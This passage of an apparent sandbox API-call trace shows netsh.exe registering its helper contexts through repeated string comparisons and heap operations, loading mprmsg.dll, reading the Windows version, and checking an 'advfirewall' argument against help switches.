RegisterContext () returned 0x0 [0137.935] _wcsicmp (_String1="p2p", _String2="advfirewall") returned 15 [0137.935] _wcsicmp (_String1="p2p", _String2="bridge") returned 14 [0137.935] _wcsicmp (_String1="p2p", _String2="dhcpclient") returned 12 [0137.935] _wcsicmp (_String1="p2p", _String2="dnsclient") returned 12 [0137.935] _wcsicmp (_String1="p2p", _String2="firewall") returned 10 [0137.935] _wcsicmp (_String1="p2p", _String2="http") returned 8 [0137.935] _wcsicmp (_String1="p2p", _String2="interface") returned 7 [0137.935] _wcsicmp (_String1="p2p", _String2="ipsec") returned 7 [0137.935] _wcsicmp (_String1="p2p", _String2="lan") returned 4 [0137.935] _wcsicmp (_String1="p2p", _String2="namespace") returned 2 [0137.935] _wcsicmp (_String1="p2p", _String2="netio") returned 2 [0137.935] _wcsicmp (_String1="p2p", _String2="ras") returned -2 [0137.935] _wcsicmp (_String1="p2p", _String2="trace") returned -4 [0137.935] _wcsicmp (_String1="p2p", _String2="wfp") returned -7 [0137.935] _wcsicmp (_String1="p2p", _String2="advfirewall") returned 15 [0137.935] _wcsicmp (_String1="p2p", _String2="bridge") returned 14 [0137.935] _wcsicmp (_String1="p2p", _String2="dhcpclient") returned 12 [0137.935] _wcsicmp (_String1="p2p", _String2="dnsclient") returned 12 [0137.935] _wcsicmp (_String1="p2p", _String2="firewall") returned 10 [0137.935] _wcsicmp (_String1="p2p", _String2="http") returned 8 [0137.935] _wcsicmp (_String1="p2p", _String2="interface") returned 7 [0137.935] _wcsicmp (_String1="p2p", _String2="ipsec") returned 7 [0137.935] _wcsicmp (_String1="p2p", _String2="lan") returned 4 [0137.935] _wcsicmp (_String1="p2p", _String2="namespace") returned 2 [0137.935] _wcsicmp (_String1="p2p", _String2="netio") returned 2 [0137.935] _wcsicmp (_String1="p2p", _String2="ras") returned -2 [0137.935] GetProcessHeap () returned 0x1cff6a50000 [0137.935] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x690) returned 0x1cff6aaebf0 [0137.935] GetProcessHeap () returned 0x1cff6a50000 [0137.935] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac5b0) returned 1 [0137.936] RegisterContext () returned 0x0 [0137.936] GetProcessHeap () returned 0x1cff6a50000 [0137.936] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99700 [0137.936] GetProcessHeap () returned 0x1cff6a50000 [0137.936] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.941] RegisterContext () returned 0x0 [0137.941] _wcsicmp (_String1="group", _String2="pnrp") returned -9 [0137.941] _wcsicmp (_String1="group", _String2="pnrp") returned -9 [0137.941] GetProcessHeap () returned 0x1cff6a50000 [0137.941] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6a9b5c0 [0137.941] GetProcessHeap () returned 0x1cff6a50000 [0137.941] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a99700) returned 1 [0137.942] RegisterContext () returned 0x0 [0137.942] _wcsicmp (_String1="idmgr", _String2="group") returned 2 [0137.942] _wcsicmp (_String1="idmgr", _String2="pnrp") returned -7 [0137.942] _wcsicmp (_String1="idmgr", _String2="group") returned 2 [0137.942] _wcsicmp (_String1="idmgr", _String2="pnrp") returned -7 [0137.942] GetProcessHeap () returned 0x1cff6a50000 [0137.942] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x150) returned 0x1cff6aa43a0 [0137.942] GetProcessHeap () returned 0x1cff6a50000 [0137.942] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b5c0) returned 1 [0137.942] RegisterContext () returned 0x0 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99e00 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.943] RegisterContext () returned 0x0 [0137.943] _wcsicmp (_String1="diagnostics", _String2="cloud") returned 1 [0137.943] _wcsicmp (_String1="diagnostics", _String2="cloud") returned 1 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6a9b5c0 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a99e00) returned 1 [0137.943] RegisterContext () returned 0x0 [0137.943] _wcsicmp (_String1="peer", _String2="cloud") returned 13 [0137.943] _wcsicmp (_String1="peer", _String2="diagnostics") returned 12 [0137.943] _wcsicmp (_String1="peer", _String2="cloud") returned 13 [0137.943] _wcsicmp (_String1="peer", _String2="diagnostics") returned 12 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x150) returned 0x1cff6a77db0 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9b5c0) returned 1 [0137.943] RegisterContext () returned 0x0 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99580 [0137.943] GetProcessHeap () returned 0x1cff6a50000 [0137.943] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.944] RegisterContext () returned 0x0 [0137.944] _wcsicmp (_String1="rpc", _String2="advfirewall") returned 17 [0137.944] _wcsicmp (_String1="rpc", _String2="bridge") returned 16 [0137.944] _wcsicmp (_String1="rpc", _String2="dhcpclient") returned 14 [0137.944] _wcsicmp (_String1="rpc", _String2="dnsclient") returned 14 [0137.944] _wcsicmp (_String1="rpc", _String2="firewall") returned 12 [0137.944] _wcsicmp (_String1="rpc", _String2="http") returned 10 [0137.944] _wcsicmp (_String1="rpc", _String2="interface") returned 9 [0137.944] _wcsicmp (_String1="rpc", _String2="ipsec") returned 9 [0137.944] _wcsicmp (_String1="rpc", _String2="lan") returned 6 [0137.944] _wcsicmp (_String1="rpc", _String2="namespace") returned 4 [0137.944] _wcsicmp (_String1="rpc", _String2="netio") returned 4 [0137.944] _wcsicmp (_String1="rpc", _String2="p2p") returned 2 [0137.944] _wcsicmp (_String1="rpc", _String2="ras") returned 15 [0137.944] _wcsicmp (_String1="rpc", _String2="trace") returned -2 [0137.944] _wcsicmp (_String1="rpc", _String2="wfp") returned -5 [0137.944] _wcsicmp (_String1="rpc", _String2="advfirewall") returned 17 [0137.944] _wcsicmp (_String1="rpc", _String2="bridge") returned 16 [0137.944] _wcsicmp (_String1="rpc", _String2="dhcpclient") returned 14 [0137.944] _wcsicmp (_String1="rpc", _String2="dnsclient") returned 14 [0137.944] _wcsicmp (_String1="rpc", _String2="firewall") returned 12 [0137.944] _wcsicmp (_String1="rpc", _String2="http") returned 10 [0137.944] _wcsicmp (_String1="rpc", _String2="interface") returned 9 [0137.944] _wcsicmp (_String1="rpc", _String2="ipsec") returned 9 [0137.944] _wcsicmp (_String1="rpc", _String2="lan") returned 6 [0137.944] _wcsicmp (_String1="rpc", _String2="namespace") returned 4 [0137.944] _wcsicmp (_String1="rpc", _String2="netio") returned 4 [0137.944] _wcsicmp (_String1="rpc", _String2="p2p") returned 2 [0137.944] _wcsicmp (_String1="rpc", _String2="ras") returned 15 [0137.944] _wcsicmp (_String1="rpc", _String2="trace") returned -2 [0137.944] GetProcessHeap () returned 0x1cff6a50000 [0137.944] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x700) returned 0x1cff6aaf290 [0137.945] GetProcessHeap () returned 0x1cff6a50000 [0137.945] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaebf0) returned 1 [0137.945] RegisterContext () returned 0x0 [0137.945] GetProcessHeap () returned 0x1cff6a50000 [0137.945] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99d80 [0137.945] GetProcessHeap () returned 0x1cff6a50000 [0137.945] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.945] RegisterContext () returned 0x0 [0137.945] _wcsicmp (_String1="wcn", _String2="advfirewall") returned 22 [0137.945] _wcsicmp (_String1="wcn", _String2="bridge") returned 21 [0137.945] _wcsicmp (_String1="wcn", _String2="dhcpclient") returned 19 [0137.945] _wcsicmp (_String1="wcn", _String2="dnsclient") returned 19 [0137.945] _wcsicmp (_String1="wcn", _String2="firewall") returned 17 [0137.945] _wcsicmp (_String1="wcn", _String2="http") returned 15 [0137.945] _wcsicmp (_String1="wcn", _String2="interface") returned 14 [0137.945] _wcsicmp (_String1="wcn", _String2="ipsec") returned 14 [0137.945] _wcsicmp (_String1="wcn", _String2="lan") returned 11 [0137.945] _wcsicmp (_String1="wcn", _String2="namespace") returned 9 [0137.945] _wcsicmp (_String1="wcn", _String2="netio") returned 9 [0137.945] _wcsicmp (_String1="wcn", _String2="p2p") returned 7 [0137.945] _wcsicmp (_String1="wcn", _String2="ras") returned 5 [0137.945] _wcsicmp (_String1="wcn", _String2="rpc") returned 5 [0137.945] _wcsicmp (_String1="wcn", _String2="trace") returned 3 [0137.945] _wcsicmp (_String1="wcn", _String2="wfp") returned -3 [0137.945] _wcsicmp (_String1="wcn", _String2="advfirewall") returned 22 [0137.945] _wcsicmp (_String1="wcn", _String2="bridge") returned 21 [0137.945] _wcsicmp (_String1="wcn", _String2="dhcpclient") returned 19 [0137.945] _wcsicmp (_String1="wcn", _String2="dnsclient") returned 19 [0137.945] _wcsicmp (_String1="wcn", _String2="firewall") returned 17 [0137.945] _wcsicmp (_String1="wcn", _String2="http") returned 15 [0137.945] _wcsicmp (_String1="wcn", _String2="interface") returned 14 [0137.946] _wcsicmp (_String1="wcn", _String2="ipsec") returned 14 [0137.946] _wcsicmp (_String1="wcn", _String2="lan") returned 11 [0137.946] _wcsicmp (_String1="wcn", _String2="namespace") returned 9 [0137.946] _wcsicmp (_String1="wcn", _String2="netio") returned 9 [0137.946] _wcsicmp (_String1="wcn", _String2="p2p") returned 7 [0137.946] _wcsicmp (_String1="wcn", _String2="ras") returned 5 [0137.946] _wcsicmp (_String1="wcn", _String2="rpc") returned 5 [0137.946] _wcsicmp (_String1="wcn", _String2="trace") returned 3 [0137.946] _wcsicmp (_String1="wcn", _String2="wfp") returned -3 [0137.946] GetProcessHeap () returned 0x1cff6a50000 [0137.946] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x770) returned 0x1cff6aaf9a0 [0137.946] GetProcessHeap () returned 0x1cff6a50000 [0137.946] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaf290) returned 1 [0137.946] RegisterContext () returned 0x0 [0137.946] _wcsicmp (_String1="winhttp", _String2="advfirewall") returned 22 [0137.946] _wcsicmp (_String1="winhttp", _String2="bridge") returned 21 [0137.946] _wcsicmp (_String1="winhttp", _String2="dhcpclient") returned 19 [0137.946] _wcsicmp (_String1="winhttp", _String2="dnsclient") returned 19 [0137.946] _wcsicmp (_String1="winhttp", _String2="firewall") returned 17 [0137.946] _wcsicmp (_String1="winhttp", _String2="http") returned 15 [0137.946] _wcsicmp (_String1="winhttp", _String2="interface") returned 14 [0137.946] _wcsicmp (_String1="winhttp", _String2="ipsec") returned 14 [0137.946] _wcsicmp (_String1="winhttp", _String2="lan") returned 11 [0137.946] _wcsicmp (_String1="winhttp", _String2="namespace") returned 9 [0137.946] _wcsicmp (_String1="winhttp", _String2="netio") returned 9 [0137.946] _wcsicmp (_String1="winhttp", _String2="p2p") returned 7 [0137.946] _wcsicmp (_String1="winhttp", _String2="ras") returned 5 [0137.946] _wcsicmp (_String1="winhttp", _String2="rpc") returned 5 [0137.946] _wcsicmp (_String1="winhttp", _String2="trace") returned 3 [0137.946] _wcsicmp (_String1="winhttp", _String2="wcn") returned 6 [0137.947] _wcsicmp (_String1="winhttp", _String2="wfp") returned 3 [0137.947] _wcsicmp (_String1="winhttp", _String2="advfirewall") returned 22 [0137.947] _wcsicmp (_String1="winhttp", _String2="bridge") returned 21 [0137.947] _wcsicmp (_String1="winhttp", _String2="dhcpclient") returned 19 [0137.947] _wcsicmp (_String1="winhttp", _String2="dnsclient") returned 19 [0137.947] _wcsicmp (_String1="winhttp", _String2="firewall") returned 17 [0137.947] _wcsicmp (_String1="winhttp", _String2="http") returned 15 [0137.947] _wcsicmp (_String1="winhttp", _String2="interface") returned 14 [0137.947] _wcsicmp (_String1="winhttp", _String2="ipsec") returned 14 [0137.947] _wcsicmp (_String1="winhttp", _String2="lan") returned 11 [0137.947] _wcsicmp (_String1="winhttp", _String2="namespace") returned 9 [0137.947] _wcsicmp (_String1="winhttp", _String2="netio") returned 9 [0137.947] _wcsicmp (_String1="winhttp", _String2="p2p") returned 7 [0137.947] _wcsicmp (_String1="winhttp", _String2="ras") returned 5 [0137.947] _wcsicmp (_String1="winhttp", _String2="rpc") returned 5 [0137.947] _wcsicmp (_String1="winhttp", _String2="trace") returned 3 [0137.947] _wcsicmp (_String1="winhttp", _String2="wcn") returned 6 [0137.947] _wcsicmp (_String1="winhttp", _String2="wfp") returned 3 [0137.947] GetProcessHeap () returned 0x1cff6a50000 [0137.947] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x7e0) returned 0x1cff6aaebf0 [0137.947] GetProcessHeap () returned 0x1cff6a50000 [0137.947] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaf9a0) returned 1 [0137.947] RegisterContext () returned 0x0 [0137.947] _wcsicmp (_String1="wlan", _String2="advfirewall") returned 22 [0137.947] _wcsicmp (_String1="wlan", _String2="bridge") returned 21 [0137.947] _wcsicmp (_String1="wlan", _String2="dhcpclient") returned 19 [0137.947] _wcsicmp (_String1="wlan", _String2="dnsclient") returned 19 [0137.947] _wcsicmp (_String1="wlan", _String2="firewall") returned 17 [0137.947] _wcsicmp (_String1="wlan", _String2="http") returned 15 [0137.947] _wcsicmp (_String1="wlan", _String2="interface") returned 14 [0137.947] _wcsicmp (_String1="wlan", _String2="ipsec") returned 14 [0137.948] _wcsicmp (_String1="wlan", _String2="lan") returned 11 [0137.948] _wcsicmp (_String1="wlan", _String2="namespace") returned 9 [0137.948] _wcsicmp (_String1="wlan", _String2="netio") returned 9 [0137.948] _wcsicmp (_String1="wlan", _String2="p2p") returned 7 [0137.948] _wcsicmp (_String1="wlan", _String2="ras") returned 5 [0137.948] _wcsicmp (_String1="wlan", _String2="rpc") returned 5 [0137.948] _wcsicmp (_String1="wlan", _String2="trace") returned 3 [0137.948] _wcsicmp (_String1="wlan", _String2="wcn") returned 9 [0137.948] _wcsicmp (_String1="wlan", _String2="wfp") returned 6 [0137.948] _wcsicmp (_String1="wlan", _String2="winhttp") returned 3 [0137.948] _wcsicmp (_String1="wlan", _String2="advfirewall") returned 22 [0137.948] _wcsicmp (_String1="wlan", _String2="bridge") returned 21 [0137.948] _wcsicmp (_String1="wlan", _String2="dhcpclient") returned 19 [0137.948] _wcsicmp (_String1="wlan", _String2="dnsclient") returned 19 [0137.948] _wcsicmp (_String1="wlan", _String2="firewall") returned 17 [0137.948] _wcsicmp (_String1="wlan", _String2="http") returned 15 [0137.948] _wcsicmp (_String1="wlan", _String2="interface") returned 14 [0137.948] _wcsicmp (_String1="wlan", _String2="ipsec") returned 14 [0137.948] _wcsicmp (_String1="wlan", _String2="lan") returned 11 [0137.948] _wcsicmp (_String1="wlan", _String2="namespace") returned 9 [0137.948] _wcsicmp (_String1="wlan", _String2="netio") returned 9 [0137.948] _wcsicmp (_String1="wlan", _String2="p2p") returned 7 [0137.948] _wcsicmp (_String1="wlan", _String2="ras") returned 5 [0137.948] _wcsicmp (_String1="wlan", _String2="rpc") returned 5 [0137.948] _wcsicmp (_String1="wlan", _String2="trace") returned 3 [0137.948] _wcsicmp (_String1="wlan", _String2="wcn") returned 9 [0137.948] _wcsicmp (_String1="wlan", _String2="wfp") returned 6 [0137.948] _wcsicmp (_String1="wlan", _String2="winhttp") returned 3 [0137.948] GetProcessHeap () returned 0x1cff6a50000 [0137.948] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x850) returned 0x1cff6aaf3e0 [0137.948] GetProcessHeap () returned 0x1cff6a50000 [0137.949] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaebf0) returned 1 [0137.949] RegisterContext () returned 0x0 [0137.949] _wcsicmp (_String1="winsock", _String2="advfirewall") returned 22 [0137.949] _wcsicmp (_String1="winsock", _String2="bridge") returned 21 [0137.949] _wcsicmp (_String1="winsock", _String2="dhcpclient") returned 19 [0137.949] _wcsicmp (_String1="winsock", _String2="dnsclient") returned 19 [0137.949] _wcsicmp (_String1="winsock", _String2="firewall") returned 17 [0137.949] _wcsicmp (_String1="winsock", _String2="http") returned 15 [0137.949] _wcsicmp (_String1="winsock", _String2="interface") returned 14 [0137.949] _wcsicmp (_String1="winsock", _String2="ipsec") returned 14 [0137.949] _wcsicmp (_String1="winsock", _String2="lan") returned 11 [0137.949] _wcsicmp (_String1="winsock", _String2="namespace") returned 9 [0137.949] _wcsicmp (_String1="winsock", _String2="netio") returned 9 [0137.949] _wcsicmp (_String1="winsock", _String2="p2p") returned 7 [0137.949] _wcsicmp (_String1="winsock", _String2="ras") returned 5 [0137.949] _wcsicmp (_String1="winsock", _String2="rpc") returned 5 [0137.949] _wcsicmp (_String1="winsock", _String2="trace") returned 3 [0137.949] _wcsicmp (_String1="winsock", _String2="wcn") returned 6 [0137.949] _wcsicmp (_String1="winsock", _String2="wfp") returned 3 [0137.949] _wcsicmp (_String1="winsock", _String2="winhttp") returned 11 [0137.949] _wcsicmp (_String1="winsock", _String2="wlan") returned -3 [0137.949] _wcsicmp (_String1="winsock", _String2="advfirewall") returned 22 [0137.949] _wcsicmp (_String1="winsock", _String2="bridge") returned 21 [0137.949] _wcsicmp (_String1="winsock", _String2="dhcpclient") returned 19 [0137.949] _wcsicmp (_String1="winsock", _String2="dnsclient") returned 19 [0137.949] _wcsicmp (_String1="winsock", _String2="firewall") returned 17 [0137.949] _wcsicmp (_String1="winsock", _String2="http") returned 15 [0137.949] _wcsicmp (_String1="winsock", _String2="interface") returned 14 [0137.949] _wcsicmp (_String1="winsock", _String2="ipsec") returned 14 [0137.949] _wcsicmp (_String1="winsock", _String2="lan") returned 11 [0137.949] _wcsicmp (_String1="winsock", _String2="namespace") returned 9 [0137.949] _wcsicmp (_String1="winsock", _String2="netio") returned 9 [0137.949] _wcsicmp (_String1="winsock", _String2="p2p") returned 7 [0137.950] _wcsicmp (_String1="winsock", _String2="ras") returned 5 [0137.950] _wcsicmp (_String1="winsock", _String2="rpc") returned 5 [0137.950] _wcsicmp (_String1="winsock", _String2="trace") returned 3 [0137.950] _wcsicmp (_String1="winsock", _String2="wcn") returned 6 [0137.950] _wcsicmp (_String1="winsock", _String2="wfp") returned 3 [0137.950] _wcsicmp (_String1="winsock", _String2="winhttp") returned 11 [0137.950] _wcsicmp (_String1="winsock", _String2="wlan") returned -3 [0137.950] GetProcessHeap () returned 0x1cff6a50000 [0137.950] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x8c0) returned 0x1cff6aafc40 [0137.950] GetProcessHeap () returned 0x1cff6a50000 [0137.950] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aaf3e0) returned 1 [0137.950] RegisterContext () returned 0x0 [0137.950] _wcsicmp (_String1="mbn", _String2="advfirewall") returned 12 [0137.950] _wcsicmp (_String1="mbn", _String2="bridge") returned 11 [0137.950] _wcsicmp (_String1="mbn", _String2="dhcpclient") returned 9 [0137.950] _wcsicmp (_String1="mbn", _String2="dnsclient") returned 9 [0137.950] _wcsicmp (_String1="mbn", _String2="firewall") returned 7 [0137.950] _wcsicmp (_String1="mbn", _String2="http") returned 5 [0137.950] _wcsicmp (_String1="mbn", _String2="interface") returned 4 [0137.950] _wcsicmp (_String1="mbn", _String2="ipsec") returned 4 [0137.950] _wcsicmp (_String1="mbn", _String2="lan") returned 1 [0137.950] _wcsicmp (_String1="mbn", _String2="namespace") returned -1 [0137.950] _wcsicmp (_String1="mbn", _String2="netio") returned -1 [0137.950] _wcsicmp (_String1="mbn", _String2="p2p") returned -3 [0137.950] _wcsicmp (_String1="mbn", _String2="ras") returned -5 [0137.950] _wcsicmp (_String1="mbn", _String2="rpc") returned -5 [0137.950] _wcsicmp (_String1="mbn", _String2="trace") returned -7 [0137.950] _wcsicmp (_String1="mbn", _String2="wcn") returned -10 [0137.950] _wcsicmp (_String1="mbn", _String2="wfp") returned -10 [0137.950] _wcsicmp (_String1="mbn", _String2="winhttp") returned -10 [0137.950] _wcsicmp (_String1="mbn", _String2="winsock") returned -10 [0137.950] _wcsicmp (_String1="mbn", _String2="wlan") returned -10 [0137.951] _wcsicmp (_String1="mbn", _String2="advfirewall") returned 12 [0137.951] _wcsicmp (_String1="mbn", _String2="bridge") returned 11 [0137.951] _wcsicmp (_String1="mbn", _String2="dhcpclient") returned 9 [0137.951] _wcsicmp (_String1="mbn", _String2="dnsclient") returned 9 [0137.951] _wcsicmp (_String1="mbn", _String2="firewall") returned 7 [0137.951] _wcsicmp (_String1="mbn", _String2="http") returned 5 [0137.951] _wcsicmp (_String1="mbn", _String2="interface") returned 4 [0137.951] _wcsicmp (_String1="mbn", _String2="ipsec") returned 4 [0137.951] _wcsicmp (_String1="mbn", _String2="lan") returned 1 [0137.951] _wcsicmp (_String1="mbn", _String2="namespace") returned -1 [0137.951] GetProcessHeap () returned 0x1cff6a50000 [0137.951] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x930) returned 0x1cff6ab0510 [0137.951] GetProcessHeap () returned 0x1cff6a50000 [0137.951] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aafc40) returned 1 [0138.446] RegisterContext () returned 0x0 [0138.446] _wcsicmp (_String1="branchcache", _String2="advfirewall") returned 1 [0138.446] _wcsicmp (_String1="branchcache", _String2="bridge") returned -8 [0138.446] _wcsicmp (_String1="branchcache", _String2="dhcpclient") returned -2 [0138.446] _wcsicmp (_String1="branchcache", _String2="dnsclient") returned -2 [0138.446] _wcsicmp (_String1="branchcache", _String2="firewall") returned -4 [0138.446] _wcsicmp (_String1="branchcache", _String2="http") returned -6 [0138.446] _wcsicmp (_String1="branchcache", _String2="interface") returned -7 [0138.446] _wcsicmp (_String1="branchcache", _String2="ipsec") returned -7 [0138.447] _wcsicmp (_String1="branchcache", _String2="lan") returned -10 [0138.447] _wcsicmp (_String1="branchcache", _String2="mbn") returned -11 [0138.447] _wcsicmp (_String1="branchcache", _String2="namespace") returned -12 [0138.447] _wcsicmp (_String1="branchcache", _String2="netio") returned -12 [0138.447] _wcsicmp (_String1="branchcache", _String2="p2p") returned -14 [0138.447] _wcsicmp (_String1="branchcache", _String2="ras") returned -16 [0138.447] _wcsicmp (_String1="branchcache", _String2="rpc") returned -16 [0138.447] _wcsicmp (_String1="branchcache", _String2="trace") returned -18 [0138.447] _wcsicmp (_String1="branchcache", _String2="wcn") returned -21 [0138.447] _wcsicmp (_String1="branchcache", _String2="wfp") returned -21 [0138.447] _wcsicmp (_String1="branchcache", _String2="winhttp") returned -21 [0138.447] _wcsicmp (_String1="branchcache", _String2="winsock") returned -21 [0138.447] _wcsicmp (_String1="branchcache", _String2="wlan") returned -21 [0138.447] _wcsicmp (_String1="branchcache", _String2="advfirewall") returned 1 [0138.447] _wcsicmp (_String1="branchcache", _String2="bridge") returned -8 [0138.447] GetProcessHeap () returned 0x1cff6a50000 [0138.447] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x9a0) returned 0x1cff6ab5780 [0138.447] GetProcessHeap () returned 0x1cff6a50000 [0138.447] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6ab0510) returned 1 [0138.447] RegisterContext () returned 0x0 [0138.447] GetProcessHeap () returned 0x1cff6a50000 [0138.447] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99f00 [0138.447] GetProcessHeap () returned 0x1cff6a50000 [0138.447] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0138.448] LoadLibraryExW (lpLibFileName="mprmsg.dll", hFile=0x0, dwFlags=0x800) returned 0x7ffe54c70000 [0138.513] GetProcAddress (hModule=0x7ffe54c70000, lpProcName="MprmsgGetErrorString") returned 0x7ffe54c71040 [0138.513] SetConsoleCtrlHandler (HandlerRoutine=0x7ff73dc88410, Add=1) returned 1 [0138.513] SetThreadUILanguage (LangId=0x0) returned 0x409 [0138.764] _wcsicmp (_String1="advfirewall", _String2="-?") returned 52 [0138.764] _wcsicmp (_String1="advfirewall", _String2="-h") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="?") returned 34 [0138.765] _wcsicmp (_String1="advfirewall", _String2="/?") returned 50 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-v") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-a") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-c") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-f") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-r") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-u") returned 52 [0138.765] _wcsicmp (_String1="advfirewall", _String2="-p") returned 52 [0138.765] GetVersionExW (in: lpVersionInformation=0x3e092f78b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x3e092f78b0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x3ad7, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0138.765] _vsnwprintf (in: _Buffer=0x7ff73dc97ca0, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x3e092f7878 | out: _Buffer="10.0.15063") returned 10 [0138.765] _vsnwprintf (in: _Buffer=0x7ff73dc97eb0, _BufferCount=0x103, _Format="%d", _ArgList=0x3e092f7878 | out: _Buffer="15063") returned 5 [0138.765] _vsnwprintf (in: _Buffer=0x7ff73dc980c0, _BufferCount=0x103, _Format="%d", _ArgList=0x3e092f7878 | out: _Buffer="0") returned 1 [0138.765] _vsnwprintf (in: _Buffer=0x7ff73dc982d0, _BufferCount=0x103, _Format="%d", _ArgList=0x3e092f7878 | out: _Buffer="0") returned 1 [0138.765] GetProcessHeap () returned 0x1cff6a50000 [0138.765] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9e800 [0138.765] GetProcessHeap () returned 0x1cff6a50000 [0138.765] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eb80 [0138.765] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9e820 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ec40 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xc) returned 0x1cff6a9e9e0 [0138.766] wcscpy_s (in: _Destination=0x1cff6a9e9e0, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9e820) returned 1 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9eb80) returned 1 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ea80 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9ec60 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x52) returned 0x1cff6aa02a0 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9eb80 [0138.766] GetProcessHeap () returned 0x1cff6a50000 [0138.766] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x18) returned 0x1cff6a9e820 [0138.766] wcscpy_s (in: 